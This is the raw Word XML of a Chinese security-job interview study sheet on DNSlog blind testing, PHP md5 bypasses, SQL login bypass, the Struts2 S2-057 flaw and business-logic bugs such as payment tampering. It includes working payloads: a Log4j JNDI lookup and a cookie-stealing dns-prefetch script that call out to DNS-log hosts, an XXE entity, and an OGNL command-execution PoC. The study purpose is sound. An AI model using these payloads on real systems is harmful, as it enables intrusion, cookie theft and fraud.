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2653D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/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面试题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251AAF69">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:spacing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"/>
          <w:woUserID w:val="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一、Sql注入部分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"/>
          <w:woUserID w:val="4"/>
        </w:rPr>
        <w:t>（重点）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D56F9F0">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto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1、Dnslog除了可以用于sql注入盲注回显外，还可以用到什么地方？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5957C262">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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远程命令执行rce的盲打</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BE68B6"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Log4j2的poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD761B"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pyload:cores?action=${jndi:ldap://${sys:java.version}.i913n8.ceye.io}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E517076">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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Xss的盲打</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37778A6C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule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&lt;img src=http://test.x7sfjd.dnslog.cn/hguone&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599907FE">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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CSP绕过 利用dns预解析绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637908CB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Payload：document.querySelector('body').innerHTML += "&lt;link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rel='dns-prefetch'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href='" + window.btoa(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document.cookie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.split(/;|=/)[1]) + ".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your-dnslog.com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'&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2204AAAD">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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XXE的盲注利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46564E5E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XXE盲打（无回显）验证，引用外部实体，可以利用dnslog在平台获取所需要的信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF607DD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曾经用burp自带的Collaborator client利用bp自带的dnslog平台获得xxe盲注的回显。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE4435B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流量特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE89B12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foo [&lt;!ENTITY % xxe SYSTEM "https://exploit-0a8500b90361c04dc0f44fbe0106009f.web-security-academy.net/exploit"&gt; %xxe;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564B16E7">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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SSRF的盲打</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3562F6AB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一个没有回显的 SSRF 场景，我们同样可以通过 DNSLog 知道是否存在漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1216114C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example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AF5906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"http://127.0.0.1:81/sql.php?url=http:/ssrf.ro8bpi.dnslog.cn，如果得到了解析记录，则证明有ssrf"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http://127.0.0.1:81/sql.php?url=http://ssrf.ro8bpi.dnslog.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77203A49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如果得到了解析记录，则证明有ssrf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12845674">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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PHP的md5绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FB7482">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh"/>
          <w:woUserID w:val="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1、说说php md5绕过的集中方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh"/>
          <w:woUserID w:val="4"/>
        </w:rPr>
        <w:t>（重点）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB36B93">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0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（1）弱比较 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0e绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033DC414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0e开头的字符串在参与比较时,会被当做科学计数法,结果转换为0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D96E5E7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比如将两个md5值进行弱类型比较</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C997EE5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md5('QNKCDZO') == md5(240610708)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEC93D7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MD5加密后会变成这个样子</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028D7554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0e830400451993494058024219903391 == 0e462097431906509019562988736854</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C3D765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由于0e开头的字符串会转换为0,所以真正比较的过程会变成下面这样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E822E3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 == 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46174173">
      <w:pPr>
        <w:pStyle w:val="5"/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（2）数组绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B64CA7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md5不能加密数组,传入数组会报错,但会继续执行并且返回结果为null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E7FA1E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比如将两个数组的md5值进行比较</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2958325F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md5(a[]=1) === md5(b[]=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17464270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由于md5函数无法处理数组,会返回null,所以md5加密后的结果是下面这样</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6988E0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null === null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3BDAD4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结果返回true,也就是说数组的md5值进行比较时,结果相等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32009D15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需要注意的是0e绕过只能绕过弱类型比较(==),而数组绕过不只可以绕过弱类型比较,还可以绕过强类型比较(===)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2FCF51">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="24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（3）MD5碰撞绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3382EE"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很难</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5959F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:leftChars="0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2、数据库的万能密码都有那些？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D843E1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（1）‘ or 1=1 --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5102FA4D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（2）ffifdyop 的MD5加密结果是 276f722736c95d99e921722cf9ed621c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4648BE5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0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经过MySQL编码后会变成'or'6xxx,使SQL恒成立,相当于万能密码,可以绕过md5()函数的加密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4B8BDE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21A14D6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903CDA7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A8B963">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing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描述下s2-057漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh"/>
          <w:woUserID w:val="4"/>
        </w:rPr>
        <w:t>（重点）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E95E7E2"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当web应用中使用了Struts2 Convention插件时，alwaysSelectFullNamespace属性值是会开启的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C25E89"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开启alwaysSelectFullNamespace属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131E7F62"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在org.apache.struts2.dispatcher.mapper.DefaultActionMapper#parseNameAndNamespace方法中解析uri时，如果alwaysSelectFullNamespace属性值为true，会进入到能执行命令的分支，就可以利用漏洞远程执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2302BC0C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto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s2-057漏洞存在需要有两个必要条件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh"/>
          <w:woUserID w:val="4"/>
        </w:rPr>
        <w:t>（重点）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271CE53E"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 alwaysSelectFullNamespace属性值为true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2.、存在缺省namespace的package，或namespace使用了通配符（如“/*”）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24442991">
      <w:pPr>
        <w:pStyle w:val="4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3、s2-057流量关键字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC01C25"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Ognl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16741791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Poc（exp）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6E6F21"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(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FE550C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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业务逻辑漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A987AAB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挖洞的过程中遇到比较多的漏洞是什么？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE2992C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文件上传漏洞，特别是头像上传的地方比较容易有文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155AA2FA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Sql注入漏洞，头注入有时候会遇到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F26CD53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再有就是很大量的逻辑漏洞啦，比如越权，支付逻辑漏洞，等等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76105A83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说说你曾经挖出来的逻辑漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh"/>
          <w:woUserID w:val="4"/>
        </w:rPr>
        <w:t>（重点）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ED411B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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比较多是只做客户端验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4647F672"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使用BP等工具进行抓包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篡改数据，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便很容易绕过客户端控件的检查，进行恶意数据的输入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67073DE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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验证码过于简单可以爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BF71E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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边界值的一些缺陷，比如重要变量溢出的一些情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC287C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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业务流程有问题，导致可以通过数据包的改动或者丢弃，实现鉴权的绕过，金额的修改等等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B62A9F5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常见逻辑漏洞有哪些？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh"/>
          <w:woUserID w:val="5"/>
        </w:rPr>
        <w:t>（重点）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EA8FD7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未授权访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593F656D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验证码绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3229CC3E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密码找回</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2704081F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密码修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01941739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登录页面用户覆盖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DCCCAC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支付漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C7B359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水平越权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21363933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垂直越权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FB0DE3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交叉越权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED8009A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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突破限制 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B013C15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什么是越权漏洞？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F41D661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用户可以操作超出自己管理权限范围的功能，从而进行非一般用户可以操作的行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E80FA06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分为水平越权和垂直越权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ADB9CF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如果使用A用户的权限去操作B用户的数据，A的权限小于B的权限，如果能够成功操作，则称之为越权操作。越权漏洞形成的原因是后台使用了不合理的权限校验规则导致的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752A4500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越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方，当用户对权限页面内的信息进行这些操作时，后台需要对当前用户的权限进行校验，看其是否具备操作的权限，从而给出响应，而如果校验的规则过于简单则容易出现越权漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0003F58B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有哪些分类？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F40B9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分为水平越权和垂直越权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A583A56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水平越权：A用户和B用户属于同一级别用户，但各自不能操作对方个人信息，A用户如果越权操作B用户的个人信息的情况称为平行越权操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A6607D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垂直越权：A用户权限高于B用户，B用户越权操作A用户的权限的情况称为垂直越权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A31AB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如何进行防护越权漏洞？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD55D07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前后端同时对用户登录输入信息等进行检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAA7B50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对用户输入可控参数进行严格校验，防止攻击者枚举</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D28D99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对统一ip设置访问次数限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A45949F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添加验证码校验，短信校验等，同时对验证码重发时间进行限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257B396B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执行关键操作前必须验证用户身份，验证用户是否具备操作数据权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10514104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特别敏感操作可以让用户再次输入密码或其他的验证信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C75EF69"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可以从用户的加密认证 cookie 中获取当前用户 id，防止攻击者对其修改。或在 session、cookie 中加入不可预测、不可猜解的 user 信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26052353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越权漏洞测试方法思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F5AF7A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确认业务流程---&gt;寻找流程中可以被操控的环节---&gt;分析其中可产生的逻辑问题---&gt;尝试修改参数进行触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260EAC3A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:num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常见越权功能点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D71F9B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（1）根据订单号ID查订单、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B29FD3E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（2）根据用户 ID 查看帐户信息、修改 / 找回密码等。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FB37A7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（3）手机号码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B3B74A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（4）商品ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E229ED1">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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:woUserID w:val="2"/>
        </w:rPr>
        <w:t>登录处存在的逻辑漏洞有哪些？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAE575F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采用弱密码或者无密码进行登录（弱口令）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FA5CCB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密码可爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A454226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验证码可爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4273B7E1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短信轰炸</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EE57F0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手机验证码凭证可查看(后端返回包可能包含验证码信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3231F24D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万能验证码（1、任意验证码复用2、测试方便遗留下得万能验证码0000/1111/6666）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7774B7B1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前端验证登录结果（修改返回包内容）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AEBC8E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任意用户密码找回/重置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7960AE66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用户批量注册</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20717188">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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登录成功凭证可以复用（使用登录成功的凭证，任意登录其他用户）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF6107"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 w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh" w:bidi="ar"/>
        </w:rPr>
        <w:t>支付漏洞有哪些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh" w:bidi="ar"/>
          <w:woUserID w:val="2"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="660AE082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" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13410CFB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修改支付价格(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Emoji" w:hAnsi="Emoji" w:eastAsia="Emoji" w:cs="Emoji"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:woUserID w:val="2"/>
        </w:rPr>
        <w:t>购买商品一般分为三步骤：订购、确认信息、付款</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:woUserID w:val="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"/>
          <w:woUserID w:val="2"/>
        </w:rPr>
        <w:t>,每一步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Emoji" w:hAnsi="Emoji" w:eastAsia="Emoji" w:cs="Emoji"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:woUserID w:val="2"/>
        </w:rPr>
        <w:t>其修改的金额值你可以尝试小数目或者尝试负数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:woUserID w:val="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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600FE3AC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修改支付状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457A6CC3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修改购买数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1918B581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修改附属值 （可以修改优惠卷得金额、修改积分得金额）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E2064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修改支付得接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C6658A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>多重替换支付（两个订单，将金额少的订单和金额多的做替换，可以将高价值得物品通过低金额购买）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C38732">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:num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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh"/>
          <w:woUserID w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve">多线程并发问题 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E64B5EA">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/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"/>
          <w:woUserID w:val="2"/>
        </w:rPr>
        <w:t>11、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目标站禁止注册用户，找回密码处随便输入用户名提示：“此用户不存在”，你觉得这里怎样利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ADE430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先爆破用户名，再利用被爆破出来的用户名爆破密码。其实有些站点，在登陆处也会这样提示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D065AB1">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/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"/>
          <w:woUserID w:val="2"/>
        </w:rPr>
        <w:t>12、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密码找回漏洞可以通过哪些方式进行绕过？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69CF6D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密码允许暴力破解、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5B13EC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存在通用型找回凭证、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF8157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可以跳过验证步骤、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9DCD64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找回凭证可以拦包获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461DC70D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等方式来通过厂商提供的密码找回功能来得到密码。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465F74BE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41B8CFF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820386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ADC16C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38D1FA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48BB73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82E28D2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B87A203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4F31498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F31769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40D5D5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4DDB68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A37D49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C84B70B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0D561A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79633E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09BCE6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5A89D8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4363149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F64FFDE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-755015</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1007745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6772275" cy="5120005"/>
            <wp:effectExtent l="0" t="0" r="952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C4BA2"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0D86F5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54F2E7"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Emoj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18F54"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="83118F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9724296"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B97242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C20EE07"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BC20EE0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C1E761"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C8C1E7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D7BE2AC3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D7BE2AC3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5">
    <w:nsid w:val="E140F7A7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E140F7A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696977C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E69697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EA6A8F9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="EEA6A8F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ACD21E6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FACD21E6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9">
    <w:nsid w:val="FBADC45A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FBADC45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10E43F49"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="10E43F4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ZmFkZDBmYTM2NTExY2FlYTA3NjgyMmEzNjI2NGYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="119579DC"/>
    <w:rsid w:val="087B07CA"/>
    <w:rsid w:val="0FBF24C6"/>
    <w:rsid w:val="119579DC"/>
    <w:rsid w:val="15FB3ECA"/>
    <w:rsid w:val="23733FB9"/>
    <w:rsid w:val="23EB6A05"/>
    <w:rsid w:val="29E8702D"/>
    <w:rsid w:val="314B7AB5"/>
    <w:rsid w:val="35946BC7"/>
    <w:rsid w:val="36487D4B"/>
    <w:rsid w:val="52CA6EA2"/>
    <w:rsid w:val="5BBEF181"/>
    <w:rsid w:val="5E2B0208"/>
    <w:rsid w:val="6DA870D3"/>
    <w:rsid w:val="747FCF47"/>
    <w:rsid w:val="7BB11849"/>
    <w:rsid w:val="8EF7E49C"/>
    <w:rsid w:val="D9FAF865"/>
    <w:rsid w:val="EEDFDD8E"/>
    <w:rsid w:val="FBDD4E2C"/>
    <w:rsid w:val="FE765DAE"/>
    <w:rsid w:val="FFEFB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6590</Words>
  <Characters>11149</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>11519</CharactersWithSpaces>
  <Application>WPS Office WWO_wpscloud_20240924172434-ba01a16e6a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2022-09-29T03:03:00Z</dcterms:created>
  <dc:creator>venisa</dc:creator>
  <cp:lastModifiedBy>大大</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-09T17:28:49Z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2052-12.9.0.18580</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>26662F3D9DFD47D9D14C06670BDA92D7_43</vt:lpwstr>
  </property>
</Properties>
</file>